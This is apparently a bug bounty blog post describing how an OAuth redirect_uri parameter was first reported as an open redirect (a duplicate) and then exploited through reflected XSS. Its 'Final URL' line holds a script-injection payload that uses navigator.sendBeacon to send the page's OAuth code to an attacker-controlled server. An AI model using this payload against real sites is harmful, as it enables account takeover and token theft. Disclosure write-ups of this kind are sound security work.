Never Give Up, The Story Behind a Dupe-To-Triaged

This is the story about how I got a dupe (within 24hs!) and then found another (valid) vulnerability with the same impact.

The application used the Oauth mechanism to authenticate. The endpoint looked like the following:[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed the redirect_uri parameter to point to my server and I saw how the application redirected me to it… so this is an Open Redirect vulnerability on Let’s get an Account Takeover vulnerability!

In my PoC, I made that the redirect_uri parameter point to my server and just that, because the Oauth code is sent within request too. So, that was easy. I made the report, sent it, and after 3 days I got the duplicated notification…

My submission (left) Dupe (Right)
Keep trying

I thought for a while how to get an Account Takeover, but with different techniques. And then an idea popped in my head like an XSS alert popup ;-)

If I can exploit an XSS vulnerability in that endpoint, maybe I can steal the Oauth token, and that’s it! I made the following PoC:[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

It worked!

But, what makes the difference between a simple JavaScript popup and ATO (Account TakeOver)? A cool payload. So let’s try to figure it out (thanks@mastersec !)

Final Payload:


Final URL:[REDACTED]&redirect_uri=aaa”><script>navigator.sendBeacon(‘',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And the result was the authentication token submitted to the server that I control. WIN

I submitted the vulnerability and finally, after 2 days, it got triaged and I received the bounty $$$ :-)

So, always remember, KEEP TRYING!

I hope you enjoyed this write up. Happy Hacking-Hunting

Hope you liked the post! If you would like to contact me, please visit or write to

#BugBounty #BugBountyTips #Hacking

Information Security Consultant, Researcher & Illusionist